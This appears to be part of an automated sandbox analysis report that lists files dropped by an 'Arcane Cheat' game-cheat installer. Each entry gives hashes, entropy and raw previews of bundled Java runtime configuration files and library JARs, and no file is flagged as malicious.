                                Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\javaws.policy (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):103
                                Entropy (8bit):4.802539000066613
                                Encrypted:false
                                SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                Malicious:false
                                Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\local_policy.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3527
                                Entropy (8bit):7.521709350514316
                                Encrypted:false
                                SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                MD5:57AAAA3176DC28FC554EF0906D01041A
                                SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                Malicious:false
                                Preview:PK........H..C................META-INF/MANIFEST.MF...o.0...;....-..N.I.._..!S..^L..v+....~....K.....9.......-.qLc,.P.N..%QG.b....n...`..m.u...Yw...ak....+to..1.............."m.i8..z}{B...^uV...1..s.>>..Z-.&..%....A..W..t..c....?z.o....A.]d0a...^..a........./..'..NQQ.%...4..l..}....N..A.f..Q[G.K^.S...o..PK.....8....h...PK........H..C................META-INF/ORACLE_J.SF..Ko.0...}.....U....A........-!....c...4..m.E..F.;.G.c..5...AH.qW.93.....-...`...#.Y.1..=.......b....0/.p...`...}...!.N..a'.....'..?eW..(b..SD.(0;*=h.W\.....w........ ........hg. y.....D...1.L'+...P..QOM..f.w...{\m...Tl.&i..!N~..Q.5...8............/.....UzY..$>.}.m..'.............g>.....D.O...o..V...o.O....4....~.2.7..'.o/....}.PK...E..\.......PK........H..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\sound.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1249
                                Entropy (8bit):4.735634480139973
                                Encrypted:false
                                SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                MD5:BB63293B1207CB8608C5FBE089A1B06D
                                SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                Malicious:false
                                Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\tzdb.dat (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):103910
                                Entropy (8bit):7.113278604363908
                                Encrypted:false
                                SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                Malicious:false
                                Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\tzmappings (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8602
                                Entropy (8bit):5.204166069367786
                                Encrypted:false
                                SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                Malicious:false
                                Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E

                                C:\Program Files (x86)\Arcane Cheat\jre\release (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):5.416086012521588
                                Encrypted:false
                                SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                Malicious:false
                                Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..

                                C:\Program Files (x86)\Arcane Cheat\lib\asm-all.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):247787
                                Entropy (8bit):7.915391305945515
                                Encrypted:false
                                SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                MD5:F5AD16C7F0338B541978B0430D51DC83
                                SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                Malicious:false
                                Preview:PK........RT.IcT..............META-INF/MANIFEST.MF.....T]o.0.}G...x.6.......L.T..X_'.\..3.....h....).}r...zF.[.6.3(.........G..LFl. .....z4....4.A@*"........5&.....=..Ah^`.I....N.3......y1#.s.r.5h...D.J7.....s..2..4.05H5.{...A..|.,...}..C....'.tT.g.d.}..I../.....8.2&.w.........+.."..`c.y._...?..9.{........L3.0.....M...6..T.x.R.tQ..+#...`4.K..)f.L.5.^..(..22U....-.#.5Qdj.......n.e=5$..$b."...sA!..D....OO..fNg.... ui.2...=....-..R.G..E..V3..G..m.i..L...f.......8.`......^........!...`5.0V.%?...D&.Iy5.....?...V.._..m.T..B.:..-..Ng)%....}o.w._PK........RT.I................org/..PK........RT.I................org/objectweb/..PK........RT.I................org/objectweb/asm/..PK........RT.I............)...org/objectweb/asm/AnnotationVisitor.class..]O.`.....(+.....:']...`L..b...../.4M..R.~...&.%...~(.9m...3{..?...y....??....]..@E. .v.P.{b..w.'.....'.;......~....qt.^.i.....><.....}.&a..u..&l..{..u. ..........s'3..(L_.^.>.z...uU.<$(..9I.......'......'.........

                                C:\Program Files (x86)\Arcane Cheat\lib\dn-compiled-module.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1850819
                                Entropy (8bit):7.997100164817221
                                Encrypted:true
                                SSDEEP:49152:9xGaHZG2oz7FdgA8P5HZVbHV3rQhGaGpC9GH:ya5G2OsDt3mGeGH
                                MD5:09A5796F0C8BE8288067374A09EE5B61
                                SHA1:9EBF1F5CC79C49BCA767DB1640DBB8DB6C9E500F
                                SHA-256:2D1790EF6A7262DEE38702FEEA2C8EFE4B804B2DA5983E598801F322EF0BF90F
                                SHA-512:D9A63D01658D61E1ADAC17D792154C8F94D44998DC27A74E71547BB9AB3A56D5EB6ADC5120CAD9048E8A648C2E4958246A3DA354FA9D52104165F494EFD3BA12
                                Malicious:false
                                Preview:PK........F..X................META-INF/....PK........E..Xc..\...h.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..y...R.KRSt.*A.-......u....4....sR......K..h.r.r..PK........D..X.................packages/PK........E..X................action/PK........D..X................app/PK........D..X................app/forms/PK........D..X................app/modules/PK........E..X................behaviour/PK........E..X................behaviour/custom/PK........E..X................facade/PK........E..X................php/PK........E..X................php/framework/PK........E..X................php/gui/PK........E..X................php/gui/framework/PK........E..X................php/gui/framework/behaviour/PK........E..X............#...php/gui/framework/behaviour/custom/PK........E..X................php/gui/framework/event/PK........E..X................php/gui/layout/PK........E..X................script/PK........E..X................script/storage/PK........E..X................

                                C:\Program Files (x86)\Arcane Cheat\lib\dn-php-sdk.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):13202
                                Entropy (8bit):7.737712617961208
                                Encrypted:false
                                SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................JPHP-INF/..PK........3.\K................JPHP-INF/sdk/..PK........3.\K..e.....\... ...JPHP-INF/sdk/ArithmeticError.phpe..j.0...@.Ac...n]..C..+8....)Xr....t.`cI.......i.K..t.V..F..)@...l.[B...G^b.E=I.a.2J..'..%.b. ^.......z........S ........v......d.h4...1NN]..,..t...~..yo&...G.....<@A...5. .\..ET.w;.S...w.....a..61...[.O....k....PK........3.\K.J.......... ...JPHP-INF/sdk/array-functions.php.Y]o.0.}G.?..M....M[.U.j.h.=F&..q2.0.u.}Nb ....:.@7p....p...Y...\]^v;.e.)C.....z.z.G...z1.P....h...U..H...jc.O..@4..U.._..K..C....6...q;..v.t;.})q....Q..eE..5wg+.l.c..V.......T{qJ..(53.cXn..<..#.k.....RI.A..8...D$..0..0]os...|...OR...p......]..`0.f.8.q....p...H....E..4>{...5.Xf.....5...Wms...>....LH..$,`C......T..#.#K..4".....f.-!h..MAle.m.a..2.....AZ......iT.Z.....Vu.J.a......p..4.6B..I..D9GY....}.L"Mh.....$...M.

                                C:\Program Files (x86)\Arcane Cheat\lib\gson.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):231952
                                Entropy (8bit):7.8987047381149225
                                Encrypted:false
                                SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                MD5:5134A2350F58890FFB9DB0B40047195D
                                SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                Malicious:false
                                Preview:PK...........H................META-INF/PK...........H..Q?....p.......META-INF/MANIFEST.MF.R]..0.|...`....$.8...SQ.C.....Kp... ..u>0.U..9.....Y....M..J3)2.....+A9..A..M.x.R.....q.SD].l{)w.......\..........=...N.n36..F.FM.../.b.6.A.D...l.Z].x4M'.t<.R7z..w.k}._.S@.g.z..81%E..dh.l.a.G.."'........n......Je.h6lM.(..r.{_.T&.....[....Z...N_. G.c............T6.z.z]m...N.s+..........R.Zg.`.Qg.a...a+e.J..W..%.P....7.I...$..wi.{...*...{...=.N......Q@.`v..$..G..........M./m3.....6.O.9...T.P.[X........~Lc.{Q$.QXHe=k...D.pE.nH...PK...........H................com/PK...........H................com/google/PK...........H................com/google/gson/PK...........H................com/google/gson/annotations/PK...........H................com/google/gson/internal/PK...........H................com/google/gson/internal/bind/PK...........H............#...com/google/gson/internal/bind/util/PK...........H................com/google/gson/reflect/PK...........H................com/google/g

                                C:\Program Files (x86)\Arcane Cheat\lib\is-0BEL9.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17374
                                Entropy (8bit):7.682654493549437
                                Encrypted:false
                                SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................org/..PK........3.\K................org/develnext/..PK........3.\K................org/develnext/jphp/..PK........3.\K................org/develnext/jphp/ext/..PK........3.\K................org/develnext/jphp/ext/gui/..PK........3.\K............#...org/develnext/jphp/ext/gui/desktop/..PK........3.\K............+...org/develnext/jphp/ext/gui/desktop/classes/..PK........3.\K.|wk.......6...org/develnext/jphp/ext/gui/desktop/classes/Mouse.class.SmO.A.~...^O....J..P..QQ.."&M*.0|2!.c)...n..../&F.....(..-.A..}f.yff......2..0e.&.m.B!....ha..<C.#..~..P....0VZ.+T.]W....&.^.r.b.....r.|.E....m..Z.+...R...V..k^.......<.....z_F.K. ....!|%..{`.Q.%..[..].(..}..XeHQ........h...S.i.!....*.a.i.(..F6..m.I...R...Yp.2[....C..))%.f...]..Mt7..Sm6...D.D......'.K3);i{.7..ER..5..'N'..73ip?&^.hoZ.up.....,.e.wq..}.W..`.+..g.%....|...S.....*......&t.

                                C:\Program Files (x86)\Arcane Cheat\lib\is-2IL8O.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1850819
                                Entropy (8bit):7.997100164817221
                                Encrypted:true
                                SSDEEP:49152:9xGaHZG2oz7FdgA8P5HZVbHV3rQhGaGpC9GH:ya5G2OsDt3mGeGH
                                MD5:09A5796F0C8BE8288067374A09EE5B61
                                SHA1:9EBF1F5CC79C49BCA767DB1640DBB8DB6C9E500F
                                SHA-256:2D1790EF6A7262DEE38702FEEA2C8EFE4B804B2DA5983E598801F322EF0BF90F
                                SHA-512:D9A63D01658D61E1ADAC17D792154C8F94D44998DC27A74E71547BB9AB3A56D5EB6ADC5120CAD9048E8A648C2E4958246A3DA354FA9D52104165F494EFD3BA12
                                Malicious:false
                                Preview:PK........F..X................META-INF/....PK........E..Xc..\...h.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..y...R.KRSt.*A.-......u....4....sR......K..h.r.r..PK........D..X.................packages/PK........E..X................action/PK........D..X................app/PK........D..X................app/forms/PK........D..X................app/modules/PK........E..X................behaviour/PK........E..X................behaviour/custom/PK........E..X................facade/PK........E..X................php/PK........E..X................php/framework/PK........E..X................php/gui/PK........E..X................php/gui/framework/PK........E..X................php/gui/framework/behaviour/PK........E..X............#...php/gui/framework/behaviour/custom/PK........E..X................php/gui/framework/event/PK........E..X................php/gui/layout/PK........E..X................script/PK........E..X................script/storage/PK........E..X................

                                C:\Program Files (x86)\Arcane Cheat\lib\is-54OT5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):704689
                                Entropy (8bit):7.834558665203789
                                Encrypted:false
                                SSDEEP:12288:sSn9gd/GXLtKb+Ozu5idmEfcHOPJZ7bw1kXn0yZLJZsDDpJSWB5qSEhQ:sMw/GXUb+euCVIOxRQIZOnuK
                                MD5:6696368A09C7F8FED4EA92C4E5238CEE
                                SHA1:F89C282E557D1207AFD7158B82721C3D425736A7
                                SHA-256:C25D7A7B8F0715729BCCB817E345F0FDD668DD4799C8DAB1A4DB3D6A37E7E3E4
                                SHA-512:0AB24F07F956E3CDCD9D09C3AA4677FF60B70D7A48E7179A02E4FF9C0D2C7A1FC51624C3C8A5D892644E9F36F84F7AAF4AA6D2C9E1C291C88B3CFF7568D54F76
                                Malicious:false
                                Preview:PK........gt]K................META-INF/..PK........0.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK......../.\K................org/..PK......../.\K................org/develnext/..PK......../.\K................org/develnext/jphp/..PK......../.\K................org/develnext/jphp/ext/..PK........gt]K................org/develnext/jphp/ext/javafx/..PK........gt]K............#...org/develnext/jphp/ext/javafx/bind/..PK........gt]K....V.......>...org/develnext/jphp/ext/javafx/bind/BoundsMemoryOperation.class.V[W.U..N..a....B[.Z...h-.....E.h.-.j..$.Hf..$....|...P}.k.e.k..\.33..&..b......g_f.....K.w..a.3.f..).W.0.va._(.R.....).5.......$.Z.#).*V.\U.&..)S*6.|....V..$.S..0.cKAZA..s.-1.......3N.3.IX6_.....bn.h%.p.fa.t-....[e........k....K...U3[3.,;c<p*v......\.),.`8..g.f...|,.8!.......:.w%..m..K./.0..."+%..U...l,!..Vla....1gW-.....ol..f./.Y.....x".(."..^.....i.k'zc.........e.9.@..0hs.4/.\...UW..?.m.X..%..O.s...N..S..{....0.;.f).owu.....yZ...[.h....

                                C:\Program Files (x86)\Arcane Cheat\lib\is-8C01F.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):231952
                                Entropy (8bit):7.8987047381149225
                                Encrypted:false
                                SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                MD5:5134A2350F58890FFB9DB0B40047195D
                                SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                Malicious:false
                                Preview:PK...........H................META-INF/PK...........H..Q?....p.......META-INF/MANIFEST.MF.R]..0.|...`....$.8...SQ.C.....Kp... ..u>0.U..9.....Y....M..J3)2.....+A9..A..M.x.R.....q.SD].l{)w.......\..........=...N.n36..F.FM.../.b.6.A.D...l.Z].x4M'.t<.R7z..w.k}._.S@.g.z..81%E..dh.l.a.G.."'........n......Je.h6lM.(..r.{_.T&.....[....Z...N_. G.c............T6.z.z]m...N.s+..........R.Zg.`.Qg.a...a+e.J..W..%.P....7.I...$..wi.{...*...{...=.N......Q@.`v..$..G..........M./m3.....6.O.9...T.P.[X........~Lc.{Q$.QXHe=k...D.pE.nH...PK...........H................com/PK...........H................com/google/PK...........H................com/google/gson/PK...........H................com/google/gson/annotations/PK...........H................com/google/gson/internal/PK...........H................com/google/gson/internal/bind/PK...........H............#...com/google/gson/internal/bind/util/PK...........H................com/google/gson/reflect/PK...........H................com/google/g

                                C:\Program Files (x86)\Arcane Cheat\lib\is-DKGHN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):247787
                                Entropy (8bit):7.915391305945515
                                Encrypted:false
                                SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                MD5:F5AD16C7F0338B541978B0430D51DC83
                                SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                Malicious:false
                                Preview:PK........RT.IcT..............META-INF/MANIFEST.MF.....T]o.0.}G...x.6.......L.T..X_'.\..3.....h....).}r...zF.[.6.3(.........G..LFl. .....z4....4.A@*"........5&.....=..Ah^`.I....N.3......y1#.s.r.5h...D.J7.....s..2..4.05H5.{...A..|.,...}..C....'.tT.g.d.}..I../.....8.2&.w.........+.."..`c.y._...?..9.{........L3.0.....M...6..T.x.R.tQ..+#...`4.K..)f.L.5.^..(..22U....-.#.5Qdj.......n.e=5$..$b."...sA!..D....OO..fNg.... ui.2...=....-..R.G..E..V3..G..m.i..L...f.......8.`......^........!...`5.0V.%?...D&.Iy5.....?...V.._..m.T..B.:..-..Ng)%....}o.w._PK........RT.I................org/..PK........RT.I................org/objectweb/..PK........RT.I................org/objectweb/asm/..PK........RT.I............)...org/objectweb/asm/AnnotationVisitor.class..]O.`.....(+.....:']...`L..b...../.4M..R.~...&.%...~(.9m...3{..?...y....??....]..@E. .v.P.{b..w.'.....'.;......~....qt.^.i.....><.....}.&a..u..&l..{..u. ..........s'3..(L_.^.>.z...uU.<$(..9I.......'......'.........

                                C:\Program Files (x86)\Arcane Cheat\lib\is-E5C2I.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):475905
                                Entropy (8bit):7.8713354167151675
                                Encrypted:false
                                SSDEEP:12288:pyfuv+DnikW2IfqFXKzNGNyyRmfD4vCgdiRST:pLWDnid2IfZGAyAfczdig
                                MD5:7E5E3D6D352025BD7F093C2D7F9B21AB
                                SHA1:AD9BFC2C3D70C574D34A752C5D0EBCC43A046C57
                                SHA-256:5B37E8FF2850A4CBB02F9F02391E9F07285B4E0667F7E4B2D4515B78E699735A
                                SHA-512:C19C29F8AD8B6BEB3EED40AB7DC343468A4CA75D49F1D0D4EA0B4A5CEE33F745893FBA764D35C8BD157F7842268E0716B1EB4B8B26DCF888FB3B3F4314844AAD
                                Malicious:false
